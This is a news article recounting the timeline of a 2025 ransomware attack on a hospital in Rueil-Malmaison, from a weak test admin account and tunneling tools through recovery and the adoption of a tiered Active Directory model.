How a Ransomware Attack Infiltrated Rueil-Malmaison Hospital

How a Ransomware Attack Infiltrated Rueil-Malmaison Hospital

Between Ngrok and Pinggy, there were no favorites: the attackers who targeted the Stell Hospital Center in Rueil-Malmaison exploited both of these tunneling services.

It happened last March. In the end, the deployment of an ransomware that encrypted Windows servers. Administrative tasks for patients, among other things, were made unavailable for a period. Personal data may also have been exfiltrated.

A Test Domain Admin Account

The entry point was an old test account, reactivated on March 4, 2025 for a Wi‑Fi audit. This account, with a weak password, possessed domain admin privileges and had VPN access.

Read also: Akira: the evolution of a ransomware that encrypts up to Nutanix VMs

The initial access, via this vector, occurred on March 17 (a Monday). On March 22, lateral movement was carried out by an RDP connection to the domain controller. A persistence mechanism was then deployed, by adding Pinggy to establish an SSH connection on port 443.

On Friday, March 28, a channel was established between the domain controller and the attacker’s server using Ngrok. The same day, the ransomware was deployed and executed. The following day, traces of the attack on the systems were erased.

The Stell Hospital Center in Rueil-Malmaison Adopts AD Tiering

Encryption was not observed until Monday, March 31. From that point onward, VPN traffic was severed; the impacted servers were isolated. The next day, backups were taken offline to verify their integrity. The ANSSI and the CERT Santé teams were on-site.

On April 2, the analysis of the compromised servers began. Equipment (workstations, 4G keys, etc.) was requested from the ARS.

Active Directory (AD) reconstruction started on the 7th, in parallel with the completion of the analyses. On the 10th, the switch-over was completed. The backup service was relaunched, the affected business services were restored, and a training session on secure administration was delivered.

The April–May period was marked by the gradual restoration of HR and admissions services, as well as the deployment of new workstations. From June through September, a tiered privilege model for Active Directory was implemented.

Dawn Liphardt

Dawn Liphardt

I'm Dawn Liphardt, the founder and lead writer of this publication. With a background in philosophy and a deep interest in the social impact of technology, I started this platform to explore how innovation shapes — and sometimes disrupts — the world we live in. My work focuses on critical, human-centered storytelling at the frontier of artificial intelligence and emerging tech.

© 2025 Dawn Liphardt